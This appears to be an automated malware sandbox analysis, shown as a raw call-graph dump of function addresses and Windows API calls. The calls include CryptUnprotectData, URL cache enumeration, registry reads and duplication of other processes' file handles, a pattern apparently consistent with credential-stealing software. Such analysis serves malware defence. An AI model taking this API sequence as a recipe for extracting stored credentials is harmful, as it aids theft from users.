40bd5d 28 API calls 39273->39951 39952 404423 39273->39952 39275 40bef6 _wcsnicmp 39274->39275 39275->39272 39275->39273 39276->39273 39277 4135f7 39967 4135e0 39277->39967 39280 40b2cc 27 API calls 39281 41360d 39280->39281 39282 40a804 8 API calls 39281->39282 39283 413613 39282->39283 39284 41361b 39283->39284 39285 41363e 39283->39285 39286 40b273 27 API calls 39284->39286 39287 4135e0 FreeLibrary 39285->39287 39288 413625 GetProcAddress 39286->39288 39289 413643 39287->39289 39288->39285 39290 413648 39288->39290 39289->39049 39291 413658 39290->39291 39292 4135e0 FreeLibrary 39290->39292 39291->39049 39293 413666 39292->39293 39293->39049 39311 40399d 39310->39311 39996 403a16 39311->39996 39313 403a09 40010 40b1ab free free 39313->40010 39315 403a12 wcsrchr 39315->39039 39316 4039a3 39316->39313 39319 4039f4 39316->39319 40007 40a02c CreateFileW 39316->40007 39319->39313 39320 4099c6 2 API calls 39319->39320 39320->39313 39322 414c2e 17 API calls 39321->39322 39323 404048 39322->39323 39324 414c2e 17 API calls 39323->39324 39325 404056 39324->39325 39326 409d1f 6 API calls 39325->39326 39327 404073 39326->39327 39328 409d1f 6 API calls 39327->39328 39329 40408e 39328->39329 39330 409d1f 6 API calls 39329->39330 39331 4040a6 39330->39331 39332 403af5 20 API calls 39331->39332 39333 4040ba 39332->39333 39334 403af5 20 API calls 39333->39334 39335 4040cb 39334->39335 40037 40414f memset 39335->40037 39337 404140 40051 40b1ab free free 39337->40051 39338 4040ec memset 39342 4040e0 39338->39342 39340 404148 39340->39104 39341 4099c6 2 API calls 39341->39342 39342->39337 39342->39338 39342->39341 39343 40a8ab 9 API calls 39342->39343 39343->39342 40064 40a6e6 WideCharToMultiByte 39344->40064 39346 4087ed 40065 4095d9 memset 39346->40065 39349 408809 memset memset memset memset memset 39350 40b2cc 27 API calls 39349->39350 39351 4088a1 39350->39351 39352 409d1f 6 API calls 39351->39352 39353 4088b1 39352->39353 39376 408953 39376->39104 39396 40b633 free 39395->39396 39397 413d65 CreateToolhelp32Snapshot memset Process32FirstW 39396->39397 39398 413f00 Process32NextW 39397->39398 39399 413da5 OpenProcess 39398->39399 39400 413f17 CloseHandle 39398->39400 39401 413eb0 39399->39401 39402 413df3 memset 39399->39402 39400->39141 39401->39398 39404 413ebf free 39401->39404 39405 4099f4 3 API calls 39401->39405 40329 413f27 39402->40329 39404->39401 39405->39401 39406 413e1f 39407 413e37 GetModuleHandleW 39406->39407 40334 413959 39406->40334 40350 413ca4 39406->40350 39407->39406 39409 413e46 GetProcAddress 39407->39409 39409->39406 39411 413ea2 CloseHandle 39411->39401 39413 414c2e 17 API calls 39412->39413 39414 403eb7 39413->39414 39415 414c2e 17 API calls 39414->39415 39416 403ec5 39415->39416 39417 409d1f 6 API calls 39416->39417 39418 403ee2 39417->39418 39419 409d1f 6 API calls 39418->39419 39420 403efd 39419->39420 39421 409d1f 6 API calls 39420->39421 39422 403f15 39421->39422 39423 403af5 20 API calls 39422->39423 39424 403f29 39423->39424 39425 403af5 20 API calls 39424->39425 39426 403f3a 39425->39426 39427 40414f 33 API calls 39426->39427 39433 403f4f 39427->39433 39428 403faf 40364 40b1ab free free 39428->40364 39430 403f5b memset 39430->39433 39431 403fb7 39431->39077 39432 4099c6 2 API calls 39432->39433 39433->39428 39433->39430 39433->39432 39434 40a8ab 9 API calls 39433->39434 39434->39433 39436 414c2e 17 API calls 39435->39436 39437 403d26 39436->39437 39438 414c2e 17 API calls 39437->39438 39439 403d34 39438->39439 39440 409d1f 6 API calls 39439->39440 39441 403d51 39440->39441 39442 409d1f 6 API calls 39441->39442 39443 403d6c 39442->39443 39444 409d1f 6 API calls 39443->39444 39445 403d84 39444->39445 39446 403af5 20 API calls 39445->39446 39447 403d98 39446->39447 39448 403af5 20 API calls 39447->39448 39449 403da9 39448->39449 39450 40414f 33 API calls 39449->39450 39451 403dbe 39450->39451 39452 403e1e 39451->39452 39454 403dca memset 39451->39454 39456 4099c6 2 API calls 39451->39456 39457 40a8ab 9 API calls 39451->39457 40365 40b1ab free free 39452->40365 39454->39451 39455 403e26 39455->39092 39456->39451 39457->39451 39459 414b81 9 API calls 39458->39459 39461 414c40 39459->39461 39460 414c73 memset 39463 414c94 39460->39463 39461->39460 40366 409cea 39461->40366 40369 414592 RegOpenKeyExW 39463->40369 39466 414c64 SHGetSpecialFolderPathW 39468 414d0b 39466->39468 39467 414cc1 39469 414cf4 wcscpy 39467->39469 40370 414bb0 wcscpy 39467->40370 39468->39084 39469->39468 39471 414cd2 40371 4145ac RegQueryValueExW 39471->40371 39473 414ce9 RegCloseKey 39473->39469 39475 409d62 39474->39475 39476 409d43 wcscpy 39474->39476 39475->39115 39477 409719 2 API calls 39476->39477 39478 409d51 wcscat 39477->39478 39478->39475 39480 40aebe FindClose 39479->39480 39481 40ae21 39480->39481 39482 4099c6 2 API calls 39481->39482 39483 40ae35 39482->39483 39484 409d1f 6 API calls 39483->39484 39485 40ae49 39484->39485 39485->39158 39487 40ade0 39486->39487 39490 40ae0f 39486->39490 39488 40ade7 wcscmp 39487->39488 39487->39490 39489 40adfe wcscmp 39488->39489 39488->39490 39489->39490 39490->39158 39492 40ae18 9 API calls 39491->39492 39493 4453c4 39492->39493 39494 40ae51 9 API calls 39493->39494 39495 4453f3 39493->39495 39496 40add4 2 API calls 39493->39496 39499 445403 254 API calls 39493->39499 39494->39493 39497 40aebe FindClose 39495->39497 39496->39493 39498 4453fe 39497->39498 39498->39158 39499->39493 39501 40ae7b FindNextFileW 39500->39501 39502 40ae5c FindFirstFileW 39500->39502 39503 40ae94 39501->39503 39504 40ae8f 39501->39504 39502->39503 39506 40aeb6 39503->39506 39507 409d1f 6 API calls 39503->39507 39505 40aebe FindClose 39504->39505 39505->39503 39506->39158 39507->39506 39508->39069 39510->39144 39511->39125 39512->39125 39513->39159 39515 409c89 39514->39515 39515->39181 39516->39211 39518 413d39 39517->39518 39519 413d2f FreeLibrary 39517->39519 39520 40b633 free 39518->39520 39519->39518 39521 413d42 39520->39521 39522 40b633 free 39521->39522 39523 413d4a 39522->39523 39523->39038 39524->39041 39525->39094 39526->39108 39528 44db70 39527->39528 39529 40b6fc memset 39528->39529 39530 409c70 2 API calls 39529->39530 39531 40b732 wcsrchr 39530->39531 39532 40b743 39531->39532 39533 40b746 memset 39531->39533 39532->39533 39534 40b2cc 27 API calls 39533->39534 39535 40b76f 39534->39535 39536 409d1f 6 API calls 39535->39536 39537 40b783 39536->39537 40372 409b98 GetFileAttributesW 39537->40372 39539 40b792 39540 40b7c2 39539->39540 39541 409c70 2 API calls 39539->39541 40373 40bb98 39540->40373 39543 40b7a5 39541->39543 39545 40b2cc 27 API calls 39543->39545 39549 40b7b2 39545->39549 39546 40b837 CloseHandle 39548 40b83e memset 39546->39548 39547 40b817 39550 409a45 3 API calls 39547->39550 40406 40a6e6 WideCharToMultiByte 39548->40406 39552 409d1f 6 API calls 39549->39552 39553 40b827 CopyFileW 39550->39553 39552->39540 39553->39548 39554 40b866 39555 444432 121 API calls 39554->39555 39556 40b879 39555->39556 39557 40bad5 39556->39557 39558 40b273 27 API calls 39556->39558 39559 40baeb 39557->39559 39560 40bade DeleteFileW 39557->39560 39561 40b89a 39558->39561 39562 40b04b ??3@YAXPAX 39559->39562 39560->39559 39563 438552 134 API calls 39561->39563 39564 40baf3 39562->39564 39565 40b8a4 39563->39565 39564->39118 39566 40bacd 39565->39566 39568 4251c4 137 API calls 39565->39568 39567 443d90 111 API calls 39566->39567 39567->39557 39591 40b8b8 39568->39591 39569 40bac6 40416 424f26 123 API calls 39569->40416 39570 40b8bd memset 40407 425413 17 API calls 39570->40407 39573 425413 17 API calls 39573->39591 39576 40a71b MultiByteToWideChar 39576->39591 39577 40a734 MultiByteToWideChar 39577->39591 39580 40b9b5 memcmp 39580->39591 39581 4099c6 2 API calls 39581->39591 39582 404423 38 API calls 39582->39591 39585 40bb3e memset memcpy 40417 40a734 MultiByteToWideChar 39585->40417 39586 4251c4 137 API calls 39586->39591 39588 40bb88 LocalFree 39588->39591 39591->39569 39591->39570 39591->39573 39591->39576 39591->39577 39591->39580 39591->39581 39591->39582 39591->39585 39591->39586 39592 40ba5f memcmp 39591->39592 40408 4253ef 16 API calls 39591->40408 40409 40b64c SystemTimeToFileTime FileTimeToLocalFileTime 39591->40409 40410 4253af 17 API calls 39591->40410 40411 4253cf 17 API calls 39591->40411 40412 447280 memset 39591->40412 40413 447960 memset memcpy memcpy memcpy 39591->40413 40414 40afe8 ??2@YAPAXI memcpy ??3@YAXPAX 39591->40414 40415 447920 memcpy memcpy memcpy 39591->40415 39592->39591 39593->39120 39595 40aed1 39594->39595 39596 40aec7 FindClose 39594->39596 39595->39052 39596->39595 39598 4099d7 39597->39598 39599 4099da memcpy 39597->39599 39598->39599 39599->39103 39601 40b2cc 27 API calls 39600->39601 39602 44543f 39601->39602 39603 409d1f 6 API calls 39602->39603 39604 44544f 39603->39604 40509 409b98 GetFileAttributesW 39604->40509 39606 44545e 39607 445476 39606->39607 39608 40b6ef 253 API calls 39606->39608 39609 40b2cc 27 API calls 39607->39609 39608->39607 39610 445482 39609->39610 39611 409d1f 6 API calls 39610->39611 39612 445492 39611->39612 40510 409b98 GetFileAttributesW 39612->40510 39614 4454a1 39615 4454b9 39614->39615 39616 40b6ef 253 API calls 39614->39616 39615->39133 39616->39615 39617->39132 39618->39149 39619->39155 39620->39192 39621->39170 39622->39219 39623->39219 39624->39200 39625->39230 39626->39232 39627->39234 39629 414c2e 17 API calls 39628->39629 39630 40c2ae 39629->39630 39700 40c1d3 39630->39700 39635 40c3be 39652 40a8ab 39635->39652 39636 40afcf 2 API calls 39637 40c2fd FindFirstUrlCacheEntryW 39636->39637 39638 40c3b6 39637->39638 39639 40c31e wcschr 39637->39639 39640 40b04b ??3@YAXPAX 39638->39640 39641 40c331 39639->39641 39642 40c35e FindNextUrlCacheEntryW 39639->39642 39640->39635 39644 40a8ab 9 API calls 39641->39644 39642->39639 39643 40c373 GetLastError 39642->39643 39645 40c3ad FindCloseUrlCache 39643->39645 39646 40c37e 39643->39646 39647 40c33e wcschr 39644->39647 39645->39638 39648 40afcf 2 API calls 39646->39648 39647->39642 39649 40c34f 39647->39649 39650 40c391 FindNextUrlCacheEntryW 39648->39650 39651 40a8ab 9 API calls 39649->39651 39650->39639 39650->39645 39651->39642 39855 40a97a 39652->39855 39655 40a8cc 39655->39241 39656 40a8d0 7 API calls 39656->39655 39860 40b1ab free free 39657->39860 39659 40c3dd 39660 40b2cc 27 API calls 39659->39660 39661 40c3e7 39660->39661 39861 414592 RegOpenKeyExW 39661->39861 39663 40c3f4 39664 40c50e 39663->39664 39665 40c3ff 39663->39665 39679 405337 39664->39679 39666 40a9ce 4 API calls 39665->39666 39667 40c418 memset 39666->39667 39862 40aa1d 39667->39862 39670 40c471 39672 40c47a _wcsupr 39670->39672 39671 40c505 RegCloseKey 39671->39664 39673 40a8d0 7 API calls 39672->39673 39674 40c498 39673->39674 39675 40a8d0 7 API calls 39674->39675 39676 40c4ac memset 39675->39676 39677 40aa1d 39676->39677 39678 40c4e4 RegEnumValueW 39677->39678 39678->39671 39678->39672 39864 405220 39679->39864 39683 4099c6 2 API calls 39682->39683 39684 40a714 _wcslwr 39683->39684 39685 40c634 39684->39685 39921 405361 39685->39921 39688 40c65c wcslen 39924 4053b6 39 API calls 39688->39924 39689 40c71d wcslen 39689->39255 39691 40c677 39692 40c713 39691->39692 39925 40538b 39 API calls 39691->39925 39927 4053df 39 API calls 39692->39927 39695 40c6a5 39695->39692 39696 40c6a9 memset 39695->39696 39697 40c6d3 39696->39697 39926 40c589 44 API calls 39697->39926 39699->39248 39701 40ae18 9 API calls 39700->39701 39707 40c210 39701->39707 39702 40ae51 9 API calls 39702->39707 39703 40c264 39704 40aebe FindClose 39703->39704 39706 40c26f 39704->39706 39705 40add4 2 API calls 39705->39707 39712 40e5ed memset memset 39706->39712 39707->39702 39707->39703 39707->39705 39708 40c231 _wcsicmp 39707->39708 39709 40c1d3 35 API calls 39707->39709 39708->39707 39710 40c248 39708->39710 39709->39707 39725 40c084 22 API calls 39710->39725 39713 414c2e 17 API calls 39712->39713 39714 40e63f 39713->39714 39715 409d1f 6 API calls 39714->39715 39716 40e658 39715->39716 39726 409b98 GetFileAttributesW 39716->39726 39718 40e667 39719 40e680 39718->39719 39720 409d1f 6 API calls 39718->39720 39727 409b98 GetFileAttributesW 39719->39727 39720->39719 39722 40e68f 39723 40c2d8 39722->39723 39728 40e4b2 39722->39728 39723->39635 39723->39636 39725->39707 39726->39718 39727->39722 39749 40e01e 39728->39749 39730 40e593 39731 40e5b0 39730->39731 39732 40e59c DeleteFileW 39730->39732 39733 40b04b ??3@YAXPAX 39731->39733 39732->39731 39735 40e5bb 39733->39735 39734 40e521 39734->39730 39772 40e175 39734->39772 39737 40e5c4 CloseHandle 39735->39737 39738 40e5cc 39735->39738 39737->39738 39740 40b633 free 39738->39740 39739 40e573 39741 40e584 39739->39741 39742 40e57c CloseHandle 39739->39742 39743 40e5db 39740->39743 39793 40b1ab free free 39741->39793 39742->39741 39746 40b633 free 39743->39746 39745 40e540 39745->39739 39792 40e2ab 30 API calls 39745->39792 39747 40e5e3 39746->39747 39747->39723 39794 406214 39749->39794 39752 40e16b 39752->39734 39755 40afcf 2 API calls 39756 40e08d OpenProcess 39755->39756 39757 40e0a4 GetCurrentProcess DuplicateHandle 39756->39757 39761 40e152 39756->39761 39758 40e0d0 GetFileSize 39757->39758 39759 40e14a CloseHandle 39757->39759 39830 409a45 GetTempPathW 39758->39830 39759->39761 39760 40e160 39764 40b04b ??3@YAXPAX 39760->39764 39761->39760 39763 406214 22 API calls 39761->39763 39763->39760 39764->39752 39765 40e0ea 39833 4096dc CreateFileW 39765->39833 39767 40e0f1 CreateFileMappingW 39768 40e140 CloseHandle CloseHandle 39767->39768 39769 40e10b MapViewOfFile 39767->39769 39768->39759 39770 40e13b CloseHandle 39769->39770 39771 40e11f WriteFile UnmapViewOfFile 39769->39771 39770->39768 39771->39770 39773 40e18c 39772->39773 39834 406b90 39773->39834 39776 40e1a7 memset 39782 40e1e8 39776->39782 39777 40e299 39844 4069a3 39777->39844 39783 40e283 39782->39783 39784 40dd50 _wcsicmp 39782->39784 39790 40e244 _snwprintf 39782->39790 39851 406e8f 13 API calls 39782->39851 39852 40742e 8 API calls 39782->39852 39853 40aae3 wcslen wcslen _memicmp 39782->39853 39854 406b53 SetFilePointerEx ReadFile 39782->39854 39785 40e291 39783->39785 39786 40e288 free 39783->39786 39784->39782 39787 40aa04 free 39785->39787 39786->39785 39787->39777 39791 40a8d0 7 API calls 39790->39791 39791->39782 39792->39745 39793->39730 39795 406294 CloseHandle 39794->39795 39796 406224 39795->39796 39797 4096c3 CreateFileW 39796->39797 39798 40622d 39797->39798 39799 406281 GetLastError 39798->39799 39801 40a2ef ReadFile 39798->39801 39800 40625a 39799->39800 39800->39752 39805 40dd85 memset 39800->39805 39802 406244 39801->39802 39802->39799 39803 40624b 39802->39803 39803->39800 39804 406777 19 API calls 39803->39804 39804->39800 39806 409bca GetModuleFileNameW 39805->39806 39807 40ddbe CreateFileW 39806->39807 39810 40ddf1 39807->39810 39808 40afcf ??2@YAPAXI ??3@YAXPAX 39808->39810 39809 41352f 9 API calls 39809->39810 39810->39808 39810->39809 39811 40de0b NtQuerySystemInformation 39810->39811 39812 40de3b CloseHandle GetCurrentProcessId 39810->39812 39811->39810 39813 40de54 39812->39813 39814 413d4c 46 API calls 39813->39814 39822 40de88 39814->39822 39815 40e00c 39816 413d29 free FreeLibrary 39815->39816 39817 40e014 39816->39817 39817->39752 39817->39755 39818 40dea9 _wcsicmp 39819 40dee7 OpenProcess 39818->39819 39820 40debd _wcsicmp 39818->39820 39819->39822 39820->39819 39821 40ded0 _wcsicmp 39820->39821 39821->39819 39821->39822 39822->39815 39822->39818 39823 40dfef CloseHandle 39822->39823 39824 40df78 39822->39824 39825 40df23 GetCurrentProcess DuplicateHandle 39822->39825 39828 40df8f CloseHandle 39822->39828 39823->39822 39824->39823 39824->39828 39829 40dfae _wcsicmp 39824->39829 39825->39822 39826 40df4c memset 39825->39826 39827 41352f 9 API calls 39826->39827 39827->39822 39828->39824 39829->39822 39829->39824 39831 409a74 GetTempFileNameW 39830->39831 39832 409a66 GetWindowsDirectoryW 39830->39832 39831->39765 39832->39831 39833->39767 39835 406bd5 39834->39835 39836 406bad 39834->39836 39838 4066bf free malloc memcpy free free 39835->39838 39843 406c0f 39835->39843 39836->39835 39837 406bba _wcsicmp 39836->39837 39837->39835 39837->39836 39839 406be5 39838->39839 39840 40afcf ??2@YAPAXI ??3@YAXPAX 39839->39840 39839->39843 39841 406bff 39840->39841 39842 4068bf SetFilePointerEx memcpy ReadFile ??2@YAPAXI ??3@YAXPAX 39841->39842 39842->39843 39843->39776 39843->39777 39845 4069c4 ??3@YAXPAX 39844->39845 39846 4069af 39845->39846 39847 40b633 free 39846->39847 39848 4069ba 39847->39848 39849 40b04b ??3@YAXPAX 39848->39849 39850 4069c2 39849->39850 39850->39745 39851->39782 39852->39782 39853->39782 39854->39782 39856 40a980 39855->39856 39857 40a8bb 39856->39857 39858 40a995 _wcsicmp 39856->39858 39859 40a99c wcscmp 39856->39859 39857->39655 39857->39656 39858->39856 39859->39856 39860->39659 39861->39663 39863 40aa23 RegEnumValueW 39862->39863 39863->39670 39863->39671 39865 405335 39864->39865 39866 40522a 39864->39866 39865->39255 39867 40b2cc 27 API calls 39866->39867 39868 405234 39867->39868 39869 40a804 8 API calls 39868->39869 39870 40523a 39869->39870 39909 40b273 39870->39909 39872 405248 _mbscpy _mbscat GetProcAddress 39873 40b273 27 API calls 39872->39873 39874 405279 39873->39874 39912 405211 GetProcAddress 39874->39912 39876 405282 39877 40b273 27 API calls 39876->39877 39878 40528f 39877->39878 39913 405211 GetProcAddress 39878->39913 39880 405298 39881 40b273 27 API calls 39880->39881 39882 4052a5 39881->39882 39914 405211 GetProcAddress 39882->39914 39884 4052ae 39885 40b273 27 API calls 39884->39885 39886 4052bb 39885->39886 39915 405211 GetProcAddress 39886->39915 39888 4052c4 39889 40b273 27 API calls 39888->39889 39890 4052d1 39889->39890 39910 40b58d 27 API calls 39909->39910 39911 40b18c 39910->39911 39911->39872 39912->39876 39913->39880 39914->39884 39915->39888 39922 405220 39 API calls 39921->39922 39923 405369 39922->39923 39923->39688 39923->39689 39924->39691 39925->39695 39926->39692 39927->39689 39929 40440c FreeLibrary 39928->39929 39930 40436d 39929->39930 39931 40a804 8 API calls 39930->39931 39932 404377 39931->39932 39933 404383 39932->39933 39934 404405 39932->39934 39935 40b273 27 API calls 39933->39935 39934->39260 39934->39261 39934->39262 39936 40438d GetProcAddress 39935->39936 39937 40b273 27 API calls 39936->39937 39938 4043a7 GetProcAddress 39937->39938 39939 40b273 27 API calls 39938->39939 39940 4043ba GetProcAddress 39939->39940 39941 40b273 27 API calls 39940->39941 39942 4043ce GetProcAddress 39941->39942 39943 40b273 27 API calls 39942->39943 39944 4043e2 GetProcAddress 39943->39944 39945 4043f1 39944->39945 39946 4043f7 39945->39946 39947 40440c FreeLibrary 39945->39947 39946->39934 39947->39934 39949 404413 FreeLibrary 39948->39949 39950 40441e 39948->39950 39949->39950 39950->39277 39951->39273 39953 40447e 39952->39953 39954 40442e 39952->39954 39955 404485 CryptUnprotectData 39953->39955 39956 40449c 39953->39956 39957 40b2cc 27 API calls 39954->39957 39955->39956 39956->39273 39958 404438 39957->39958 39959 40a804 8 API calls 39958->39959 39960 40443e 39959->39960 39961 404445 39960->39961 39962 404467 39960->39962 39963 40b273 27 API calls 39961->39963 39962->39953 39965 404475 FreeLibrary 39962->39965 39964 40444f GetProcAddress 39963->39964 39964->39962 39966 404460 39964->39966 39965->39953 39966->39962 39968 4135f6 39967->39968 39969 4135eb FreeLibrary 39967->39969 39968->39280 39969->39968 39997 403a29 39996->39997 40011 403bed memset memset 39997->40011 39999 403ae7 40024 40b1ab free free 39999->40024 40001 403a3f memset 40005 403a2f 40001->40005 40002 403aef 40002->39316 40003 40a8d0 7 API calls 40003->40005 40004 409d1f 6 API calls 40004->40005 40005->39999 40005->40001 40005->40003 40005->40004 40006 409b98 GetFileAttributesW 40005->40006 40006->40005 40008 40a051 GetFileTime CloseHandle 40007->40008 40009 4039ca CompareFileTime 40007->40009 40008->40009 40009->39316 40010->39315 40012 414c2e 17 API calls 40011->40012 40013 403c38 40012->40013 40014 409719 2 API calls 40013->40014 40015 403c3f wcscat 40014->40015 40016 414c2e 17 API calls 40015->40016 40017 403c61 40016->40017 40018 409719 2 API calls 40017->40018 40019 403c68 wcscat 40018->40019 40025 403af5 40019->40025 40022 403af5 20 API calls 40023 403c95 40022->40023 40023->40005 40024->40002 40026 403b02 40025->40026 40027 40ae18 9 API calls 40026->40027 40035 403b37 40027->40035 40028 403bdb 40029 40aebe FindClose 40028->40029 40031 403be6 40029->40031 40030 40add4 wcscmp wcscmp 40030->40035 40031->40022 40032 40ae18 9 API calls 40032->40035 40033 40ae51 9 API calls 40033->40035 40034 40aebe FindClose 40034->40035 40035->40028 40035->40030 40035->40032 40035->40033 40035->40034 40036 40a8d0 7 API calls 40035->40036 40036->40035 40038 409d1f 6 API calls 40037->40038 40039 404190 40038->40039 40052 409b98 GetFileAttributesW 40039->40052 40041 40419c 40042 4041a7 6 API calls 40041->40042 40043 40435c 40041->40043 40045 40424f 40042->40045 40043->39342 40045->40043 40046 40425e memset 40045->40046 40048 409d1f 6 API calls 40045->40048 40049 40a8ab 9 API calls 40045->40049 40053 414842 40045->40053 40046->40045 40047 404296 wcscpy 40046->40047 40047->40045 40048->40045 40050 4042b6 memset memset _snwprintf wcscpy 40049->40050 40050->40045 40051->39340 40052->40041 40056 41443e 40053->40056 40055 414866 40055->40045 40057 41444b 40056->40057 40058 414451 40057->40058 40059 4144a3 GetPrivateProfileStringW 40057->40059 40060 414491 40058->40060 40061 414455 wcschr 40058->40061 40059->40055 40063 414495 WritePrivateProfileStringW 40060->40063 40061->40060 40062 414463 _snwprintf 40061->40062 40062->40063 40063->40055 40064->39346 40066 40b2cc 27 API calls 40065->40066 40067 409615 40066->40067 40068 409d1f 6 API calls 40067->40068 40069 409625 40068->40069 40094 409b98 GetFileAttributesW 40069->40094 40071 409634 40072 409648 40071->40072 40095 4091b8 memset 40071->40095 40074 40b2cc 27 API calls 40072->40074 40077 408801 40072->40077 40075 40965d 40074->40075 40076 409d1f 6 API calls 40075->40076 40078 40966d 40076->40078 40077->39349 40077->39376 40147 409b98 GetFileAttributesW 40078->40147 40080 40967c 40080->40077 40094->40071 40149 40a6e6 WideCharToMultiByte 40095->40149 40097 409202 40150 444432 40097->40150 40147->40080 40149->40097 40228 4438b5 40150->40228 40229 4438d0 40228->40229 40239 4438c9 40228->40239 40297 415378 memcpy memcpy 40229->40297 40356 413f4f 40329->40356 40332 413f37 K32GetModuleFileNameExW 40333 413f4a 40332->40333 40333->39406 40335 413969 wcscpy 40334->40335 40336 41396c wcschr 40334->40336 40339 413a3a 40335->40339 40336->40335 40338 41398e 40336->40338 40361 4097f7 wcslen wcslen _memicmp 40338->40361 40339->39406 40341 41399a 40342 4139a4 memset 40341->40342 40343 4139e6 40341->40343 40362 409dd5 GetWindowsDirectoryW wcscpy 40342->40362 40345 413a31 wcscpy 40343->40345 40346 4139ec memset 40343->40346 40345->40339 40363 409dd5 GetWindowsDirectoryW wcscpy 40346->40363 40347 4139c9 wcscpy wcscat 40347->40339 40349 413a11 memcpy wcscat 40349->40339 40351 413cb0 GetModuleHandleW 40350->40351 40352 413cda 40350->40352 40351->40352 40355 413cbf GetProcAddress 40351->40355 40353 413ce3 GetProcessTimes 40352->40353 40354 413cf6 40352->40354 40353->39411 40354->39411 40355->40352 40357 413f2f 40356->40357 40358 413f54 40356->40358 40357->40332 40357->40333 40359 40a804 8 API calls 40358->40359 40360 413f5f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 40359->40360 40360->40357 40361->40341 40362->40347 40363->40349 40364->39431 40365->39455 40367 409cf9 GetVersionExW 40366->40367 40368 409d0a 40366->40368 40367->40368 40368->39460 40368->39466 40369->39467 40370->39471 40371->39473 40372->39539 40374 40bba5 40373->40374 40418 40cc26 40374->40418 40377 40bd4b 40439 40cc0c 40377->40439 40382 40b2cc 27 API calls 40383 40bbef 40382->40383 40446 40ccf0 _wcsicmp 40383->40446 40385 40bbf5 40385->40377 40447 40ccb4 6 API calls 40385->40447 40387 40bc26 40388 40cf04 17 API calls 40387->40388 40389 40bc2e 40388->40389 40390 40bd43 40389->40390 40391 40b2cc 27 API calls 40389->40391 40392 40cc0c 4 API calls 40390->40392 40393 40bc40 40391->40393 40392->40377 40448 40ccf0 _wcsicmp 40393->40448 40395 40bc46 40395->40390 40396 40bc61 memset memset WideCharToMultiByte 40395->40396 40449 40103c strlen 40396->40449 40398 40bcc0 40399 40b273 27 API calls 40398->40399 40400 40bcd0 memcmp 40399->40400 40400->40390 40401 40bce2 40400->40401 40402 404423 38 API calls 40401->40402 40403 40bd10 40402->40403 40403->40390 40404 40bd3a LocalFree 40403->40404 40405 40bd1f memcpy 40403->40405 40404->40390 40405->40404 40406->39554 40407->39591 40408->39591 40409->39591 40410->39591 40411->39591 40412->39591 40413->39591 40414->39591 40415->39591 40416->39566 40417->39588 40450 4096c3 CreateFileW 40418->40450 40420 40cc34 40421 40cc3d GetFileSize 40420->40421 40429 40bbca 40420->40429 40422 40afcf 2 API calls 40421->40422 40423 40cc64 40422->40423 40451 40a2ef ReadFile 40423->40451 40425 40cc71 40452 40ab4a MultiByteToWideChar 40425->40452 40427 40cc95 CloseHandle 40428 40b04b ??3@YAXPAX 40427->40428 40428->40429 40429->40377 40430 40cf04 40429->40430 40431 40b633 free 40430->40431 40432 40cf14 40431->40432 40458 40b1ab free free 40432->40458 40434 40cf1b 40435 40cfef 40434->40435 40438 40bbdd 40434->40438 40459 40cd4b 40434->40459 40437 40cd4b 14 API calls 40435->40437 40437->40438 40438->40377 40438->40382 40440 40b633 free 40439->40440 40441 40cc15 40440->40441 40442 40aa04 free 40441->40442 40443 40cc1d 40442->40443 40508 40b1ab free free 40443->40508 40445 40b7d4 memset CreateFileW 40445->39546 40445->39547 40446->40385 40447->40387 40448->40395 40449->40398 40450->40420 40451->40425 40453 40ab93 40452->40453 40454 40ab6b 40452->40454 40453->40427 40455 40a9ce 4 API calls 40454->40455 40456 40ab74 40455->40456 40457 40ab7c MultiByteToWideChar 40456->40457 40457->40453 40458->40434 40460 40cd7b 40459->40460 40493 40aa29 40460->40493 40462 40cef5 40463 40aa04 free 40462->40463 40464 40cefd 40463->40464 40464->40434 40466 40aa29 6 API calls 40467 40ce1d 40466->40467 40468 40aa29 6 API calls 40467->40468 40469 40ce3e 40468->40469 40470 40ce6a 40469->40470 40501 40abb7 wcslen memmove 40469->40501 40471 40ce9f 40470->40471 40504 40abb7 wcslen memmove 40470->40504 40474 40a8d0 7 API calls 40471->40474 40477 40ceb5 40474->40477 40475 40ce56 40502 40aa71 wcslen 40475->40502 40476 40ce8b 40505 40aa71 wcslen 40476->40505 40481 40a8d0 7 API calls 40477->40481 40480 40ce5e 40503 40abb7 wcslen memmove 40480->40503 40484 40cecb 40481->40484 40482 40ce93 40506 40abb7 wcslen memmove 40482->40506 40507 40d00b malloc memcpy free free 40484->40507 40487 40cedd 40488 40aa04 free 40487->40488 40489 40cee5 40488->40489 40490 40aa04 free 40489->40490 40491 40ceed 40490->40491 40492 40aa04 free 40491->40492 40492->40462 40494 40aa33 40493->40494 40495 40aa63 40493->40495 40496 40aa44 40494->40496 40497 40aa38 wcslen 40494->40497 40495->40462 40495->40466 40498 40a9ce 4 API calls 40496->40498 40497->40496 40499 40aa4d 40498->40499 40499->40495 40500 40aa51 memcpy 40499->40500 40500->40495 40501->40475 40502->40480 40503->40470 40504->40476 40505->40482 40506->40471 40507->40487 40508->40445 40509->39606 40510->39614 40511 441819 40514 430737 40511->40514 40513 441825 40515 430756 40514->40515 40527 43076d 40514->40527 40516 430774 40515->40516 40517 43075f 40515->40517 40529 43034a memcpy 40516->40529 40528 4169a7 11 API calls 40517->40528 40520 4307ce 40522 430819 memset 40520->40522 40530 415b2c 40520->40530 40521 43077e 40521->40520 40525 4307fa 40521->40525 40521->40527 40522->40527 40524 4307e9 40524->40522 40524->40527 40537 4169a7 11 API calls 40525->40537 40527->40513 40528->40527 40529->40521 40531 415b46 40530->40531 40532 415b42 40530->40532 40531->40524 40532->40531 40533 415b94 40532->40533 40535 415b5a 40532->40535 40534 4438b5 10 API calls 40533->40534 40534->40531 40535->40531 40536 415b79 memcpy 40535->40536 40536->40531 40537->40527 40538 41493c EnumResourceNamesW

                                                                    Executed Functions

                                                                    Function 0040DD85 Relevance: 33.5, APIs: 15, Strings: 4, Instructions: 212filenativeCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
